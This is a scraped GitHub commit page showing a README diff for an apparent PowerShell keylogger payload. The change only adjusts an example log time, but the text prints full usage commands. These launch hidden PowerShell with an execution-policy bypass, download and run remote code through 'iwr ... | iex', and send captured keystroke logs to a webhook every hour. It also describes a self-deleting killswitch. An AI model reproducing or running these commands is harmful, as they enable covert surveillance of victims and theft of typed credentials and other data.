Update README.md

This commit is contained in:
I-Am-Jakoby 2022-12-25 00:16:43 -06:00 committed by GitHub
parent 601edb5988
commit 4d6d9d5725
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -58,7 +58,7 @@ powershell -w h -NoP -Ep Bypass $dc='https://link.iamjakoby.com/xxxx';iwr "https
The payload is set to send the logs collected every hour on the hour The payload is set to send the logs collected every hour on the hour
* You maybe use the `$log` variable to specify a certain time instead (Use this for testing) * You maybe use the `$log` variable to specify a certain time instead (Use this for testing)
* ex: `$log="11:34 pm"` <-- This will send the log every night at 9pm * ex: `$log="09:00 pm"` <-- This will send the log every night at 9pm
You also have the option of setting up a killswitch to have the keylogger self delete at a certain time and date You also have the option of setting up a killswitch to have the keylogger self delete at a certain time and date
@ -67,7 +67,7 @@ You also have the option of setting up a killswitch to have the keylogger self d
Calling the script with both a `log` time and `killswitch` will look something like this: Calling the script with both a `log` time and `killswitch` will look something like this:
``` ```
$dc='https://link.iamjakoby.com/xxxx';$log="11:34 pm";$ks="12/25/2022 10:00:00 PM";iwr "https://jakoby.lol/m2m" | iex $dc='https://link.iamjakoby.com/xxxx';$log="09:00 pm";$ks="12/25/2022 10:00:00 PM";iwr "https://jakoby.lol/m2m" | iex
``` ```
<p align="right">(<a href="#top">back to top</a>)</p> <p align="right">(<a href="#top">back to top</a>)</p>